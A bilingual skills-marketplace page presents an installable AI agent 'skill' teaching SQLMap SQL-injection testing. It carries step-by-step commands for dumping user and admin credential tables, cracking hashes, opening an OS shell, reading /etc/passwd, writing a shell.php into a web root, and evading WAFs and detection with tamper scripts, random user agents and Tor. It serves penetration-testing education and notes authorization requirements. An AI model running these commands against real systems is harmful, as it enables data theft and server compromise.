SQLMap数据库渗透测试教程：自动化SQL注入检测与利用完整指南

SQLMap Database Penetration Testing by claudiodearaujo/izacenter

1 GitHub Stars

GitHub

安装命令

npx skills add https://github.com/claudiodearaujo/izacenter --skill 'SQLMap Database Penetration Testing'

数据库测试安全

🇨🇳中文介绍

SQLMap 数据库渗透测试

目的

提供使用 SQLMap 进行自动化 SQL 注入检测和利用的系统化方法。此技能涵盖数据库枚举、表和列发现、数据提取、多种目标指定方法，以及针对 MySQL、PostgreSQL、MSSQL、Oracle 和其他数据库管理系统的高级利用技术。

输入 / 前提条件

目标 URL : 包含可注入参数的 Web 应用程序 URL（例如 ?id=1）
SQLMap 安装 : 预装在 Kali Linux 中或从 GitHub 下载
已验证的注入点 : 已确认或怀疑存在 SQL 注入的 URL 参数
请求文件（可选） : 用于基于 POST 注入的 Burp Suite 捕获的 HTTP 请求
授权 : 进行渗透测试活动的书面许可

输出 / 交付成果

数据库枚举 : 目标服务器上所有数据库的列表
表结构 : 目标数据库内的完整表名
列映射 : 每个表的列名和数据类型
提取的数据 : 转储的记录，包括用户名、密码和敏感数据
哈希值 : 用于离线破解的密码哈希
漏洞报告 : SQL 注入类型和严重性的确认

核心工作流程

1. 识别 SQL 注入漏洞

手动验证

# 添加单引号以中断查询
http://target.com/page.php?id=1'

# 如果出现错误消息，则很可能存在 SQL 注入
# 错误示例："You have an error in your SQL syntax"

广告位招租

在这里展示您的产品或服务

触达数万 AI 开发者，精准高效

联系我们

6. 高级目标选项

从 HTTP 请求文件指定目标

# 将 Burp Suite 请求保存到文件，然后：
sqlmap -r /path/to/request.txt --dbs --batch

从日志文件指定目标

# 提供包含多个请求的日志文件
sqlmap -l /path/to/logfile --dbs --batch

指定多个 URL（批量文件）

# 创建包含 URL 的文件，每行一个：
# http://target1.com/page.php?id=1
# http://target2.com/page.php?id=2
sqlmap -m /path/to/bulkfile.txt --dbs --batch

通过 Google Dorks 指定目标（谨慎使用）

# 自动查找并测试易受攻击的站点（仅限合法目标）
sqlmap -g "inurl:?id= site:yourdomain.com" --batch

数据库枚举流程

阶段	命令
列出数据库	`sqlmap -u "URL" --dbs --batch`
列出表	`sqlmap -u "URL" -D dbname --tables --batch`
列出列	`sqlmap -u "URL" -D dbname -T tablename --columns --batch`
转储数据	`sqlmap -u "URL" -D dbname -T tablename --dump --batch`
转储全部	`sqlmap -u "URL" -D dbname --dump-all --batch`

支持的数据库管理系统

DBMS	支持级别
MySQL	完全支持
PostgreSQL	完全支持
Microsoft SQL Server	完全支持
Oracle	完全支持
Microsoft Access	完全支持
IBM DB2	完全支持
SQLite	完全支持
Firebird	完全支持
Sybase	完全支持
SAP MaxDB	完全支持
HSQLDB	完全支持
Informix	完全支持

技术	描述	标志
基于布尔的盲注	从真/假响应推断数据	`--technique=B`
基于时间的盲注	使用时间延迟推断数据	`--technique=T`
基于错误的注入	从错误消息中提取数据	`--technique=E`
基于 UNION 查询的注入	使用 UNION 附加结果	`--technique=U`
堆叠查询	执行多个语句	`--technique=S`
带外注入	使用 DNS 或 HTTP 进行数据外泄	`--technique=Q`

选项	描述
`-u`	目标 URL
`-r`	从文件加载 HTTP 请求
`-l`	从 Burp/WebScarab 日志解析目标
`-m`	包含多个目标的批量文件
`-g`	Google dork（负责任地使用）
`--dbs`	枚举数据库
`--tables`	枚举表
`--columns`	枚举列
`--dump`	转储表数据
`--dump-all`	转储所有数据库数据
`-D`	指定数据库
`-T`	指定表
`-C`	指定列
`--batch`	非交互模式
`--random-agent`	使用随机 User-Agent
`--level`	测试级别 (1-5)
`--risk`	测试风险 (1-3)

目标 URL 中需要存在有效的可注入参数
需要连接到目标数据库服务器的网络连接
大型数据库转储可能需要大量时间
某些 WAF/IPS 系统可能会阻止 SQLMap 流量
基于时间的攻击比基于错误的攻击慢得多

使用 --threads 加速枚举（默认值：1）
对于大型表，使用 --start 和 --stop 限制转储范围
如果已知，使用 --technique 指定更快的注入方法

仅测试具有明确书面授权的系统
针对未知站点的 Google dork 攻击是非法的
记录所有测试活动和发现
遵守参与规则中定义的范围限制

SQLMap 会生成大量日志条目
使用 --random-agent 来改变 User-Agent 头
考虑使用 --delay 以避免触发速率限制
通过 Tor 代理使用 --tor 实现匿名性（仅限授权测试）

示例 1：完整的数据库枚举

# 步骤 1：发现数据库
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch
# 结果：发现 acuart 数据库

# 步骤 2：列出表
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch
# 结果：users, products, carts 等

# 步骤 3：列出列
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
# 结果：username, password, email 列

# 步骤 4：转储用户凭据
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch

示例 2：POST 请求注入

# 将 Burp 请求保存到文件 (login.txt)：
# POST /login.php HTTP/1.1
# Host: target.com
# Content-Type: application/x-www-form-urlencoded
# 
# username=admin&password=test

# 使用请求文件运行 SQLMap
sqlmap -r /root/Desktop/login.txt -p username --dbs --batch

示例 3：批量目标扫描

# 创建 bulkfile.txt：
echo "http://192.168.1.10/sqli/Less-1/?id=1" > bulkfile.txt
echo "http://192.168.1.10/sqli/Less-2/?id=1" >> bulkfile.txt

# 扫描所有目标
sqlmap -m bulkfile.txt --dbs --batch

示例 4：激进测试

# 使用高级别和高风险进行彻底测试
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --level=5 --risk=3

# 指定所有技术
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --technique=BEUSTQ

示例 5：提取特定凭据

# 针对特定列
sqlmap -u "http://target.com/page.php?id=1" \
  -D webapp \
  -T admin_users \
  -C admin_name,admin_pass,admin_email \
  --dump --batch

# 自动破解密码哈希
sqlmap -u "http://target.com/page.php?id=1" \
  -D webapp \
  -T users \
  --dump --batch \
  --passwords

示例 6：操作系统 Shell 访问（高级）

# 获取交互式操作系统 shell（需要 DBA 权限）
sqlmap -u "http://target.com/page.php?id=1" --os-shell --batch

# 执行特定操作系统命令
sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami" --batch

# 从服务器读取文件
sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batch

# 上传文件到服务器
sqlmap -u "http://target.com/page.php?id=1" --file-write="/local/shell.php" --file-dest="/var/www/html/shell.php" --batch

问题："参数似乎不可注入"

原因 : SQLMap 找不到注入点 解决方案 :

# 增加测试级别和风险
sqlmap -u "URL" --dbs --batch --level=5 --risk=3

# 显式指定参数
sqlmap -u "URL" -p "id" --dbs --batch

# 尝试不同的注入技术
sqlmap -u "URL" --dbs --batch --technique=BT

# 添加前缀/后缀以绕过过滤器
sqlmap -u "URL" --dbs --batch --prefix="'" --suffix="-- -"

问题：目标位于 WAF/防火墙之后

原因 : Web 应用程序防火墙阻止请求 解决方案 :

# 使用篡改脚本
sqlmap -u "URL" --dbs --batch --tamper=space2comment

# 列出可用的篡改脚本
sqlmap --list-tampers

# 常见的篡改脚本组合
sqlmap -u "URL" --dbs --batch --tamper=space2comment,between,randomcase

# 在请求之间添加延迟
sqlmap -u "URL" --dbs --batch --delay=2

# 使用随机 User-Agent
sqlmap -u "URL" --dbs --batch --random-agent

问题：连接超时

原因 : 网络问题或目标响应慢 解决方案 :

# 增加超时时间
sqlmap -u "URL" --dbs --batch --timeout=60

# 减少线程数
sqlmap -u "URL" --dbs --batch --threads=1

# 添加重试次数
sqlmap -u "URL" --dbs --batch --retries=5

问题：基于时间的攻击太慢

原因 : 默认时间延迟过于保守 解决方案 :

# 减少时间延迟（有风险，可能导致漏报）
sqlmap -u "URL" --dbs --batch --time-sec=3

# 如果可能，改用基于布尔的注入
sqlmap -u "URL" --dbs --batch --technique=B

问题：无法转储大型表

原因 : 表记录太多 解决方案 :

# 限制记录数量
sqlmap -u "URL" -D db -T table --dump --batch --start=1 --stop=100

# 仅转储特定列
sqlmap -u "URL" -D db -T table -C username,password --dump --batch

# 排除特定列
sqlmap -u "URL" -D db -T table --dump --batch --exclude-sysdbs

问题：长时间扫描期间会话中断

原因 : 会话超时或连接重置 解决方案 :

# 保存并恢复会话
sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_session

# 从保存的会话恢复
sqlmap -u "URL" --dbs --batch --resume

# 使用持久 HTTP 连接
sqlmap -u "URL" --dbs --batch --keep-alive

🇺🇸English

SQLMap Database Penetration Testing

Purpose

Provide systematic methodologies for automated SQL injection detection and exploitation using SQLMap. This skill covers database enumeration, table and column discovery, data extraction, multiple target specification methods, and advanced exploitation techniques for MySQL, PostgreSQL, MSSQL, Oracle, and other database management systems.

Inputs / Prerequisites

Target URL : Web application URL with injectable parameter (e.g., ?id=1)
SQLMap Installation : Pre-installed on Kali Linux or downloaded from GitHub
Verified Injection Point : URL parameter confirmed or suspected to be SQL injectable
Request File (Optional) : Burp Suite captured HTTP request for POST-based injection
Authorization : Written permission for penetration testing activities

Outputs / Deliverables

Database Enumeration : List of all databases on the target server
Table Structure : Complete table names within target database
Column Mapping : Column names and data types for each table
Extracted Data : Dumped records including usernames, passwords, and sensitive data
Hash Values : Password hashes for offline cracking
Vulnerability Report : Confirmation of SQL injection type and severity

Core Workflow

1. Identify SQL Injection Vulnerability

Manual Verification

# Add single quote to break query
http://target.com/page.php?id=1'

# If error message appears, likely SQL injectable
# Error example: "You have an error in your SQL syntax"

Initial SQLMap Scan

# Basic vulnerability detection
sqlmap -u "http://target.com/page.php?id=1" --batch

# With verbosity for detailed output
sqlmap -u "http://target.com/page.php?id=1" --batch -v 3

2. Enumerate Databases

List All Databases

sqlmap -u "http://target.com/page.php?id=1" --dbs --batch

Key Options:

-u: Target URL with injectable parameter
--dbs: Enumerate database names
--batch: Use default answers (non-interactive mode)

3. Enumerate Tables

List Tables in Specific Database

sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batch

Key Options:

-D: Specify target database name
--tables: Enumerate table names

4. Enumerate Columns

List Columns in Specific Table

sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batch

Key Options:

-T: Specify target table name
--columns: Enumerate column names

5. Extract Data

Dump Specific Table Data

sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batch

Dump Specific Columns

sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C username,password --dump --batch

Dump Entire Database

sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump-all --batch

Key Options:

--dump: Extract all data from specified table
--dump-all: Extract all data from all tables
-C: Specify column names to extract

6. Advanced Target Options

Target from HTTP Request File

# Save Burp Suite request to file, then:
sqlmap -r /path/to/request.txt --dbs --batch

Target from Log File

# Feed log file with multiple requests
sqlmap -l /path/to/logfile --dbs --batch

Target Multiple URLs (Bulk File)

# Create file with URLs, one per line:
# http://target1.com/page.php?id=1
# http://target2.com/page.php?id=2
sqlmap -m /path/to/bulkfile.txt --dbs --batch

Target via Google Dorks (Use with Caution)

# Automatically find and test vulnerable sites (LEGAL TARGETS ONLY)
sqlmap -g "inurl:?id= site:yourdomain.com" --batch

Quick Reference Commands

Database Enumeration Progression

Stage	Command
List Databases	`sqlmap -u "URL" --dbs --batch`
List Tables	`sqlmap -u "URL" -D dbname --tables --batch`
List Columns	`sqlmap -u "URL" -D dbname -T tablename --columns --batch`
Dump Data	`sqlmap -u "URL" -D dbname -T tablename --dump --batch`
Dump All	`sqlmap -u "URL" -D dbname --dump-all --batch`

Supported Database Management Systems

DBMS	Support Level
MySQL	Full Support
PostgreSQL	Full Support
Microsoft SQL Server	Full Support
Oracle	Full Support
Microsoft Access	Full Support
IBM DB2	Full Support
SQLite	Full Support
Firebird	Full Support
Sybase	Full Support
SAP MaxDB	Full Support
HSQLDB	Full Support
Informix	Full Support

SQL Injection Techniques

Technique	Description	Flag
Boolean-based blind	Infers data from true/false responses	`--technique=B`
Time-based blind	Uses time delays to infer data	`--technique=T`
Error-based	Extracts data from error messages	`--technique=E`
UNION query-based	Uses UNION to append results	`--technique=U`
Stacked queries	Executes multiple statements	`--technique=S`

Essential Options

Option	Description
`-u`	Target URL
`-r`	Load HTTP request from file
`-l`	Parse targets from Burp/WebScarab log
`-m`	Bulk file with multiple targets
`-g`	Google dork (use responsibly)
`--dbs`	Enumerate databases

Constraints and Limitations

Operational Boundaries

Requires valid injectable parameter in target URL
Network connectivity to target database server required
Large database dumps may take significant time
Some WAF/IPS systems may block SQLMap traffic
Time-based attacks significantly slower than error-based

Performance Considerations

Use --threads to speed up enumeration (default: 1)
Limit dumps with --start and --stop for large tables
Use --technique to specify faster injection method if known

Legal Requirements

Only test systems with explicit written authorization
Google dork attacks against unknown sites are illegal
Document all testing activities and findings
Respect scope limitations defined in engagement rules

Detection Risk

SQLMap generates significant log entries
Use --random-agent to vary User-Agent header
Consider --delay to avoid triggering rate limits
Proxy through Tor with --tor for anonymity (authorized tests only)

Examples

Example 1: Complete Database Enumeration

# Step 1: Discover databases
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch
# Result: acuart database found

# Step 2: List tables
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch
# Result: users, products, carts, etc.

# Step 3: List columns
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch
# Result: username, password, email columns

# Step 4: Dump user credentials
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch

Example 2: POST Request Injection

# Save Burp request to file (login.txt):
# POST /login.php HTTP/1.1
# Host: target.com
# Content-Type: application/x-www-form-urlencoded
# 
# username=admin&password=test

# Run SQLMap with request file
sqlmap -r /root/Desktop/login.txt -p username --dbs --batch

Example 3: Bulk Target Scanning

# Create bulkfile.txt:
echo "http://192.168.1.10/sqli/Less-1/?id=1" > bulkfile.txt
echo "http://192.168.1.10/sqli/Less-2/?id=1" >> bulkfile.txt

# Scan all targets
sqlmap -m bulkfile.txt --dbs --batch

Example 4: Aggressive Testing

# High level and risk for thorough testing
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --level=5 --risk=3

# Specify all techniques
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --technique=BEUSTQ

Example 5: Extract Specific Credentials

# Target specific columns
sqlmap -u "http://target.com/page.php?id=1" \
  -D webapp \
  -T admin_users \
  -C admin_name,admin_pass,admin_email \
  --dump --batch

# Automatically crack password hashes
sqlmap -u "http://target.com/page.php?id=1" \
  -D webapp \
  -T users \
  --dump --batch \
  --passwords

Example 6: OS Shell Access (Advanced)

# Get interactive OS shell (requires DBA privileges)
sqlmap -u "http://target.com/page.php?id=1" --os-shell --batch

# Execute specific OS command
sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami" --batch

# File read from server
sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batch

# File upload to server
sqlmap -u "http://target.com/page.php?id=1" --file-write="/local/shell.php" --file-dest="/var/www/html/shell.php" --batch

Troubleshooting

Issue: "Parameter does not seem injectable"

Cause : SQLMap cannot find injection point Solution :

# Increase testing level and risk
sqlmap -u "URL" --dbs --batch --level=5 --risk=3

# Specify parameter explicitly
sqlmap -u "URL" -p "id" --dbs --batch

# Try different injection techniques
sqlmap -u "URL" --dbs --batch --technique=BT

# Add prefix/suffix for filter bypass
sqlmap -u "URL" --dbs --batch --prefix="'" --suffix="-- -"

Issue: Target Behind WAF/Firewall

Cause : Web Application Firewall blocking requests Solution :

# Use tamper scripts
sqlmap -u "URL" --dbs --batch --tamper=space2comment

# List available tamper scripts
sqlmap --list-tampers

# Common tamper combinations
sqlmap -u "URL" --dbs --batch --tamper=space2comment,between,randomcase

# Add delay between requests
sqlmap -u "URL" --dbs --batch --delay=2

# Use random User-Agent
sqlmap -u "URL" --dbs --batch --random-agent

Issue: Connection Timeout

Cause : Network issues or slow target Solution :

# Increase timeout
sqlmap -u "URL" --dbs --batch --timeout=60

# Reduce threads
sqlmap -u "URL" --dbs --batch --threads=1

# Add retries
sqlmap -u "URL" --dbs --batch --retries=5

Issue: Time-Based Attacks Too Slow

Cause : Default time delay too conservative Solution :

# Reduce time delay (risky, may cause false negatives)
sqlmap -u "URL" --dbs --batch --time-sec=3

# Use boolean-based instead if possible
sqlmap -u "URL" --dbs --batch --technique=B

Issue: Cannot Dump Large Tables

Cause : Table has too many records Solution :

# Limit number of records
sqlmap -u "URL" -D db -T table --dump --batch --start=1 --stop=100

# Dump specific columns only
sqlmap -u "URL" -D db -T table -C username,password --dump --batch

# Exclude specific columns
sqlmap -u "URL" -D db -T table --dump --batch --exclude-sysdbs

Issue: Session Drops During Long Scan

Cause : Session timeout or connection reset Solution :

# Save and resume session
sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_session

# Resume from saved session
sqlmap -u "URL" --dbs --batch --resume

# Use persistent HTTP connection
sqlmap -u "URL" --dbs --batch --keep-alive

Weekly Installs

Repository

claudiodearaujo…zacenter

GitHub Stars

First Seen

Jan 1, 1970

Security Audits

Gen Agent Trust HubWarn SocketWarn SnykFail

xdrop 文件传输脚本：Bun 环境下安全上传下载工具，支持加密分享

24,700 周安装

SQLMap数据库渗透测试教程：自动化SQL注入检测与利用完整指南

🇨🇳中文介绍

SQLMap 数据库渗透测试

目的

输入 / 前提条件

输出 / 交付成果

核心工作流程

1. 识别 SQL 注入漏洞

手动验证

相关 Skills

初始 SQLMap 扫描

2. 枚举数据库

列出所有数据库

3. 枚举表

列出特定数据库中的表

4. 枚举列

列出特定表中的列

5. 提取数据

转储特定表数据

转储特定列

转储整个数据库

6. 高级目标选项

从 HTTP 请求文件指定目标

从日志文件指定目标

指定多个 URL（批量文件）

通过 Google Dorks 指定目标（谨慎使用）

快速参考命令

数据库枚举流程

支持的数据库管理系统

SQL 注入技术

基本选项

约束与限制

操作边界

性能考虑

法律要求

检测风险

示例

示例 1：完整的数据库枚举

示例 2：POST 请求注入

示例 3：批量目标扫描

示例 4：激进测试

示例 5：提取特定凭据

示例 6：操作系统 Shell 访问（高级）

故障排除

问题："参数似乎不可注入"

问题：目标位于 WAF/防火墙之后

问题：连接超时

问题：基于时间的攻击太慢

问题：无法转储大型表

问题：长时间扫描期间会话中断

🇺🇸English

SQLMap Database Penetration Testing

Purpose

Inputs / Prerequisites

Outputs / Deliverables

Core Workflow

1. Identify SQL Injection Vulnerability

Manual Verification

Initial SQLMap Scan

2. Enumerate Databases

List All Databases

3. Enumerate Tables

List Tables in Specific Database

4. Enumerate Columns

List Columns in Specific Table

5. Extract Data

Dump Specific Table Data

Dump Specific Columns

Dump Entire Database

6. Advanced Target Options

Target from HTTP Request File

Target from Log File

Target Multiple URLs (Bulk File)

Target via Google Dorks (Use with Caution)

Quick Reference Commands

Database Enumeration Progression

Supported Database Management Systems

SQL Injection Techniques

Essential Options

Constraints and Limitations